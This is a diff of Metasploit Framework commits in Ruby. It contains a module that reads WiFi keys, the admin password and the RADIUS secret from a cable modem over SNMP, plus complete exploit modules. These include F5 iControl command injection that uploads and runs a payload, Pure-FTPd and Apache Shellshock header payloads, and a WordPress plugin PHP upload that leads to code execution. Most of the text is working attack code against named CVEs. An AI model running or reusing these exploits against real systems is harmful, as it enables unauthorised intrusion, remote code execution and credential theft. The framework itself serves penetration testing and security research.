output_data["Password"] = device_ui_password.to_s
end
end
wifi_ifindex = get_primary_wifi_ifindex(snmp)
if wifi_ifindex < 1
print_status("Primary WiFi is disabled on the device")
end
ssid = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.#{wifi_ifindex}")
if is_valid_snmp_value(ssid)
output_data["SSID"] = ssid.to_s
end
wireless_band = snmp.get_value('1.3.6.1.4.1.4413.2.2.2.1.5.1.18.0')
if is_valid_snmp_value(wireless_band)
output_data["802.11 Band"] = get_wireless_band_name(wireless_band.to_i)
end
network_auth_mode = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.5.#{wifi_ifindex}")
if is_valid_snmp_value(network_auth_mode)
network_auth_mode = network_auth_mode.to_i
network_auth_mode_name = get_network_auth_mode_name(network_auth_mode)
output_data["Network Authentication Mode"] = network_auth_mode_name
end
case network_auth_mode
when 1, 6
# WEP, WEP 802.1x Authentication
wep_passphrase = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.1.1.3.#{wifi_ifindex}")
if is_valid_snmp_value(wep_passphrase)
output_data["WEP Passphrase"] = wep_passphrase.to_s
end
wep_encryption = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.1.1.2.#{wifi_ifindex}")
if is_valid_snmp_value(wep_encryption)
wep_encryption = wep_encryption.to_i
else
wep_encryption = -1
end
wep_encryption_name = "Unknown"
wep_key1 = wep_key2 = wep_key3 = wep_key4 = nil
# get appropriate WEP keys based on wep_encryption setting
if wep_encryption == 1
wep_encryption_name = "64-bit"
wep_key1 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.1")
wep_key2 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.2")
wep_key3 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.3")
wep_key4 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.4")
elsif wep_encryption == 2
wep_encryption_name = "128-bit"
wep_key1 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.1")
wep_key2 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.2")
wep_key3 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.3")
wep_key4 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.4")
end
output_data["WEP Encryption"] = wep_encryption_name
if is_valid_snmp_value(wep_key1)
output_data["WEP Key 1"] = wep_key1.unpack('H*')[0]
end
if is_valid_snmp_value(wep_key2)
output_data["WEP Key 2"] = wep_key2.unpack('H*')[0]
end
if is_valid_snmp_value(wep_key3)
output_data["WEP Key 3"] = wep_key3.unpack('H*')[0]
end
if is_valid_snmp_value(wep_key4)
output_data["WEP Key 4"] = wep_key4.unpack('H*')[0]
end
# get current network key
current_key = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.1.1.1.#{wifi_ifindex}")
if is_valid_snmp_value(current_key)
output_data["Current Network Key"] = current_key.to_s
end
if network_auth_mode == 6
get_radius_info(snmp, wifi_ifindex, output_data)
end
when 2, 3, 4, 5, 7, 8
# process all flavors of WPA
wpa_encryption = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.1.#{wifi_ifindex}")
if is_valid_snmp_value(wpa_encryption)
output_data["WPA Encryption"] = get_wpa_encryption_name(wpa_encryption.to_i)
end
wpa_psk = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.#{wifi_ifindex}")
if is_valid_snmp_value(wpa_psk)
output_data["WPA Pre-Shared Key (PSK)"] = wpa_psk.to_s
end
case network_auth_mode
when 4, 5, 8
get_radius_info(snmp, wifi_ifindex, output_data)
end
end
# output
print_line("")
print_status("Device information:\n")
line = ""
width = 30 # name field width
fields_order.each {|k|
if not output_data.has_key?(k)
next
end
v = output_data[k]
if (v.nil? or v.empty? or v =~ /Null/)
v = '-'
end
report_note(
:host => ip,
:proto => 'udp',
:sname => 'snmp',
:port => datastore['RPORT'].to_i,
:type => "snmp.#{k}",
:data => v
)
line << sprintf("%s%s: %s\n", k, " "*([0,width-k.length].max), v)
}
print_line(line)
else
print_error("#{ip} does not appear to be a SBG6580.")
end
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::InvalidIpAddress
print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
elog("Unknown error: #{e.class} #{e}")
elog("Call stack:\n#{e.backtrace.join "\n"}")
ensure
disconnect_snmp
end
end
def get_primary_wifi_ifindex(snmp)
# The ifTable contains interface entries where each row represents
# management information for a particular interface. Locate the first
# interface where ifType is 71 (ieee80211) and ifAdminStatus is 1 (up).
wifi_ifindex = 0
ifTable_columns = ["ifIndex", "ifDescr", "ifType", "ifAdminStatus"]
snmp.walk(ifTable_columns) do |ifIndex, ifDescr, ifType, ifAdminStatus|
if (wifi_ifindex < 1 and ifType.value == 71 and ifAdminStatus.value == 1)
wifi_ifindex = ifIndex.value.to_i
end
end
wifi_ifindex
end
def is_valid_snmp_value(value)
if value.nil? or value.to_s =~ /Null/ or value.to_s =~ /^noSuch/
return false
end
return true
end
def get_network_auth_mode_name(network_auth_mode)
case network_auth_mode
when 0
"Open Security"
when 1
"WEP"
when 2
"WPA-PSK"
when 3
"WPA2-PSK"
when 4
"WPA RADIUS"
when 5
"WPA2 RADIUS"
when 6
"WEP 802.1x Authentication"
when 7
"WPA-PSK and WPA2-PSK"
when 8
"WPA and WPA2 RADIUS"
else
"Unknown"
end
end
def get_wireless_band_name(wireless_band)
case wireless_band
when 1
"2.4 Ghz"
when 2
"5 Ghz"
else
"Unknown"
end
end
def get_wpa_encryption_name(wpa_encryption)
case wpa_encryption
when 2
"AES"
when 3
"TKIP+AES"
else
"Unknown"
end
end
def get_radius_info(snmp, wifi_ifindex, output_data)
radius_server = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.5.1.2.#{wifi_ifindex}")
if is_valid_snmp_value(radius_server)
output_data["RADIUS Server"] = radius_server.unpack("C4").join(".")
end
radius_port = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.5.1.3.#{wifi_ifindex}")
if is_valid_snmp_value(radius_port)
output_data["RADIUS Port"] = radius_port.to_s.strip
end
radius_key = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.5.1.4.#{wifi_ifindex}")
if is_valid_snmp_value(radius_key)
output_data["RADIUS Key"] = radius_key.to_s
end
end
end

9
modules/auxiliary/scanner/vmware/esx_fingerprint.rb
View File

@ -75,13 +75,20 @@ class Metasploit3 < Msf::Auxiliary
build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)
full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)
this_host = nil
if full_match
print_good("#{rhost}:#{rport} - Identified #{full_match[1]}")
report_service(:host => (this_host || ip), :port => rport, :proto => 'tcp', :name => 'https', :info => full_match[1])
end
if os_match and ver_match and build_match
if os_match[1] =~ /ESX/ or os_match[1] =~ /vCenter/
this_host = report_host( :host => ip, :os_name => os_match[1], :os_flavor => ver_match[1], :os_sp => "Build #{build_match[1]}" )
# Report a fingerprint match for OS identification
report_note(
:host => ip,
:ntype => 'fingerprint.match',
:data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }
)
end
return true
else

7
modules/auxiliary/scanner/vmware/vmware_http_login.rb
View File

@ -114,7 +114,12 @@ class Metasploit3 < Msf::Auxiliary
if os_match and ver_match and build_match
if os_match[1] =~ /ESX/ or os_match[1] =~ /vCenter/
this_host = report_host( :host => rhost, :os_name => os_match[1], :os_flavor => ver_match[1], :os_sp => "Build #{build_match[1]}" )
# Report a fingerprint match for OS identification
report_note(
:host => ip,
:ntype => 'fingerprint.match',
:data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }
)
end
return true
else

64
modules/auxiliary/server/browser_autopwn.rb
View File

@ -786,8 +786,12 @@ class Metasploit3 < Msf::Auxiliary
# Reject exploits whose OS doesn't match that of the
# victim. Note that host_info comes from javascript OS
# detection, NOT the database.
# Note that the os_name could be a string, a regex, or
# an array of strings and regexes.
if host_info[:os_name] != "undefined"
unless s[:os_name].include?(host_info[:os_name])
unless client_matches_module_spec?(host_info[:os_name], s[:os_name])
vprint_status("Rejecting #{s[:name]} for non-matching OS")
next
end
@ -833,6 +837,27 @@ class Metasploit3 < Msf::Auxiliary
return response
end
#
# Determines whether a browser string matches an exploit module specification
# Example: :os_name => ( 'Windows' | /Windows/ | ['Windows', 'Mac OS X'] )
#
def client_matches_module_spec?(client_str, module_spec)
case module_spec
when ::String
return !! (client_str == module_spec)
when ::Regexp
return !! client_str.match(module_spec)
when ::Array
return !! exploit_spec.map{ |spec|
client_matches_module_spec?(client_str, spec)
}.include?(true)
end
false
end
#
# Yields each module that exports autopwn_info, filtering on MATCH and EXCLUDE options
#
@ -886,6 +911,8 @@ class Metasploit3 < Msf::Auxiliary
os_flavor = nil
os_sp = nil
os_lang = nil
os_device = nil
os_vendor = nil
arch = nil
ua_name = nil
ua_ver = nil
@ -907,15 +934,20 @@ class Metasploit3 < Msf::Auxiliary
if (0 < detected_version.length)
detected_version = Rex::Text.decode_base64(Rex::Text.uri_decode(detected_version))
print_status("JavaScript Report: #{detected_version}")
(os_name, os_flavor, os_sp, os_lang, arch, ua_name, ua_ver) = detected_version.split(':')
(os_name, os_vendor, os_flavor, os_device, os_sp, os_lang, arch, ua_name, ua_ver) = detected_version.split(':')
if framework.db.active
note_data = { }
note_data[:os_name] = os_name if os_name != "undefined"
note_data[:os_flavor] = os_flavor if os_flavor != "undefined"
note_data[:os_sp] = os_sp if os_sp != "undefined"
note_data[:os_lang] = os_lang if os_lang != "undefined"
note_data[:arch] = arch if arch != "undefined"
note_data['os.product'] = os_name if os_name != 'undefined'
note_data['os.vendor'] = os_vendor if os_vendor != 'undefined'
note_data['os.edition'] = os_flavor if os_flavor != 'undefined'
note_data['os.device'] = os_device if os_device != 'undefined'
note_data['os.version'] = os_sp if os_sp != 'undefined'
note_data['os.language'] = os_lang if os_lang != 'undefined'
note_data['os.arch'] = arch if arch != 'undefined'
note_data['os.certainty'] = '0.7'
print_status("Reporting: #{note_data.inspect}")
# Reporting stuff isn't really essential since we store all
@ -926,10 +958,14 @@ class Metasploit3 < Msf::Auxiliary
# ActiveRecord::RecordInvalid errors because 127.0.0.1 is
# blacklisted in the Host validations.
begin
# Report a generic fingerprint.match note for the OS normalizer
# Previously we reported a javascript_fingerprint type but this
# was never used.
report_note({
:host => cli.peerhost,
:type => 'javascript_fingerprint',
:data => note_data,
:host => cli.peerhost,
:ntype => 'fingerprint.match',
:data => note_data,
:update => :unique_data,
})
client_info = {
@ -939,8 +975,10 @@ class Metasploit3 < Msf::Auxiliary
:ua_ver => ua_ver
}
report_client(client_info)
rescue => e
elog("Reporting failed: #{e.class} : #{e.message}")
rescue ::Interrupt
raise $!
rescue ::Exception => e
elog("Reporting failed: #{e.class} : #{e.message} #{e.backtrace}")
end
end
end
@ -971,7 +1009,9 @@ class Metasploit3 < Msf::Auxiliary
@targetcache[key][:host] = {}
@targetcache[key][:host][:os_name] = os_name
@targetcache[key][:host][:os_vendor] = os_vendor
@targetcache[key][:host][:os_flavor] = os_flavor
@targetcache[key][:host][:os_device] = os_device
@targetcache[key][:host][:os_sp] = os_sp
@targetcache[key][:host][:os_lang] = os_lang

25
modules/exploits/android/browser/webview_addjavascriptinterface.rb
View File

@ -12,18 +12,21 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Android
VULN_CHECK_JS = %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
autopwn_info(
:os_flavor => 'Android',
:os_name => OperatingSystems::Match::ANDROID,
:arch => ARCH_ARMLE,
:javascript => true,
:rank => ExcellentRanking,
:vuln_test => %Q|
for (i in top) {
try {
top[i].getClass().forName('java.lang.Runtime');
is_vuln = true; break;
} catch(e) {}
}
|
:vuln_test => VULN_CHECK_JS
)
def initialize(info = {})
@ -71,7 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'BrowserRequirements' => {
:source => 'script',
:os_flavor => 'Android'
:os_name => OperatingSystems::Match::ANDROID,
:vuln_test => VULN_CHECK_JS,
:vuln_test_error => 'No vulnerable Java objects were found in this web context.'
}
))

143
modules/exploits/linux/http/f5_icontrol_exec.rb Normal file
View File

@ -0,0 +1,143 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "F5 iControl Remote Root Command Execution",
'Description' => %q{
This module exploits an authenticated remote command execution
vulnerability in the F5 BIGIP iControl API (and likely other
F5 devices).
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' # Discovery, Metasploit module
],
'References' =>
[
['CVE', '2014-2928'],
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['F5 iControl', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 17 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
], self.class)
end
def check
get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
hostname = $1
send_cmd("whoami")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => get_hostname,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
res.body =~ /y:string">(.*)<\/return/
new_hostname = $1
if new_hostname == "root.a.b"
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>#{hostname}</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def send_cmd(cmd)
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
<hostname>`#{cmd}`.a.b</hostname>
</n1:set_hostname>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
'method' => 'POST',
'data' => pay,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
end
def exploit
filename = Rex::Text.rand_text_alpha_lower(5)
print_status('Sending payload in chunks, might take a small bit...')
i = 0
while i < payload.encoded.length
cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
send_cmd(cmd)
i = i + 5
end
print_status('Triggering payload...')
send_cmd("sh /tmp/#{filename}")
end
end

2
modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb
View File

@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
vulnerability exists in the pmd service, due to the insecure usage of functions like
strcpy and strcat while handling stack_option packets with user controlled data. In
order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
the stack and finally build the rop chain to avoid NX.
the stack and finally build the ROP chain to avoid NX.
},
'Author' =>
[

2
modules/exploits/multi/browser/firefox_escape_retval.rb
View File

@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_name => HttpClients::FF,
# :ua_minver => "3.5",
# :ua_maxver => "3.5",
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption
# :vuln_test => nil,

2
modules/exploits/multi/browser/mozilla_compareto.rb
View File

@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_name => HttpClients::FF,
# :ua_minver => "1.0",
# :ua_maxver => "1.7.10",
# :os_name => OperatingSystems::WINDOWS,
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption
# :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",

2
modules/exploits/multi/browser/opera_configoverwrite.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
autopwn_info({
:ua_name => HttpClients::OPERA,
:ua_maxver => "9.10",
:os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ],
:os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],
:javascript => true,
:rank => ExcellentRanking, # reliable cmd exec, cleans up after itself
:vuln_test => nil,

116
modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb Normal file
View File

@ -0,0 +1,116 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
'Description' => %q(
This module exploits the code injection flaw known as shellshock which
leverages specially crafted environment variables in Bash. This exploit
specifically targets Pure-FTPd when configured to use an external
program for authentication.
),
'Author' =>
[
'Stephane Chazelas', # Vulnerability discovery
'Frank Denis', # Discovery of Pure-FTPd attack vector
'Spencer McIntyre' # Metasploit module
],
'References' =>
[
['CVE', '2014-6271'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => :printf
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => :printf
}
]
],
'DefaultOptions' =>
{
'PrependFork' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'))
register_options(
[
Opt::RPORT(21),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end
def check
# this check method tries to use the vulnerability to bypass the login
username = rand_text_alphanumeric(rand(20) + 1)
random_id = (rand(100) + 1)
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
if send_command(username, command) =~ /^2\d\d ok./i
return CheckCode::Safe if banner !~ /pure-ftpd/i
disconnect
command = "echo auth_ok:0; echo end"
if send_command(username, command) =~ /^5\d\d login authentication failed/i
return CheckCode::Vulnerable
end
end
disconnect
CheckCode::Safe
end
def execute_command(cmd, _opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
username = rand_text_alphanumeric(rand(20) + 1)
send_command(username, cmd)
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(linemax: 500)
handler
end
def send_command(username, cmd)
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
connect
send_user(username)
password_result = send_pass(cmd)
disconnect
password_result
end
end

30
modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
View File

@ -22,10 +22,12 @@ class Metasploit4 < Msf::Exploit::Remote
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'wvu', # Original Metasploit aux module
'juan vazquez' # Allow wvu's module to get native sessions
'juan vazquez', # Allow wvu's module to get native sessions
'lcamtuf' # CVE-2014-6278
],
'References' => [
['CVE', '2014-6271'],
['CVE', '2014-6278'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
@ -64,12 +66,13 @@ class Metasploit4 < Msf::Exploit::Remote
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]),
OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278']])
], self.class)
end
def check
res = req("echo #{marker}")
res = req("echo #{marker}", datastore['CVE'])
if res && res.body.include?(marker * 3)
return Exploit::CheckCode::Vulnerable
@ -105,31 +108,42 @@ class Metasploit4 < Msf::Exploit::Remote
# A last chance after the cmdstager
# Trying to make it generic
unless session_created?
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}", datastore['CVE'])
end
end
def execute_command(cmd, opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
req(cmd)
req(cmd, datastore['CVE'])
end
def req(cmd)
def req(cmd, cve)
case cve
when 'CVE-2014-6271'
sploit = cve_2014_6271(cmd)
when 'CVE-2014-6278'
sploit = cve_2014_6278(cmd)
end
send_request_cgi(
{
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path.to_s),
'headers' => {
datastore['HEADER'] => sploit(cmd)
datastore['HEADER'] => sploit
}
}, datastore['TIMEOUT'])
end
def sploit(cmd)
def cve_2014_6271(cmd)
%Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
end
def cve_2014_6278(cmd)
%Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
end
def marker
@marker ||= rand_text_alphanumeric(rand(42) + 1)
end

2
modules/exploits/multi/http/opmanager_socialit_file_upload.rb
View File

@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload',
'Name' => 'ManageEngine OpManager and Social IT Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.
The vulnerability exists in the FileCollector servlet which accepts unauthenticated

2
modules/exploits/osx/browser/mozilla_mchannel.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
# :ua_name => HttpClients::FF,
# :ua_minver => "3.6.16",
# :ua_maxver => "3.6.16",
# :os_name => OperatingSystems::MAC_OSX,
# :os_name => OperatingSystems::Match::MAC_OSX,
# :javascript => true,
# :rank => NormalRanking,
#})

2
modules/exploits/osx/browser/safari_metadata_archive.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
#autopwn_info({
# :ua_name => HttpClients::SAFARI,
# :ua_maxver => '2.0.2',
# :os_name => [ OperatingSystems::MAC_OSX ],
# :os_name => OperatingSystems::Match::MAC_OSX,
# :javascript => false,
# :rank => ExcellentRanking, # reliable cmd execution
# :vuln_test => nil,

2
modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::SAFARI,
:os_name => OperatingSystems::MAC_OSX,
:os_name => OperatingSystems::Match::MAC_OSX,
# On 10.6.8 (Safari 5.x), a dialog never appears unless the user
# has already manually launched the dropped exe

8
modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb
View File

@ -32,7 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
['BID', '37314'],
['CVE', '2009-4140'],
['OSVDB', '59051'],
['EDB', '10532']
['EDB', '10532'],
['WPVDB', '6787'],
['WPVDB', '6788'],
['WPVDB', '6789'],
['WPVDB', '6790'],
['WPVDB', '6791'],
['WPVDB', '6792']
],
'Payload' =>
{

3
modules/exploits/unix/webapp/php_wordpress_foxypress.rb
View File

@ -31,7 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
['EDB', '18991'],
['OSVDB' '82652'],
['BID', '53805']
['BID', '53805'],
['WPVDB', '6231']
],
'Privileged' => false,
'Platform' => 'php',

82
modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb Normal file
View File

@ -0,0 +1,82 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Wordpress InfusionSoft Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity
Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
upload and remote code execution.
},
'Author' =>
[
'g0blin', # Vulnerability Discovery
'us3r777 <us3r777@n0b0.so>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-6446'],
['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
['WPVDB', '7634']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
'DisclosureDate' => 'Sep 25 2014',
'DefaultTarget' => 0)
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
)
if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', 'code_generator.php'),
'method' => 'POST',
'vars_post' =>
{
'fileNamePattern' => php_pagename,
'fileTemplate' => payload.encoded
}
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
register_files_for_cleanup(php_pagename)
else
fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
end
print_status("#{peer} - Calling payload ...")
send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft',
'Infusionsoft', 'utilities', php_pagename)
}, 2)
end
end

5
modules/exploits/unix/webapp/php_wordpress_lastpost.rb
View File

@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2005-2612'],
['OSVDB', '18672'],
['BID', '14533'],
['WPVDB', '6034']
],
'Privileged' => false,
'Payload' =>
@ -34,9 +35,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
'ConnectionType' => 'find'
},
'Space' => 512,
'Space' => 512
},
'Platform' => 'php',
'Arch' => ARCH_PHP,

3
modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
View File

@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ],
[ 'WPVDB', '7441' ]
],
'Privileged' => false,
'Platform' => ['php'],

3
modules/exploits/unix/webapp/php_wordpress_total_cache.rb
View File

@ -38,7 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '92652' ],
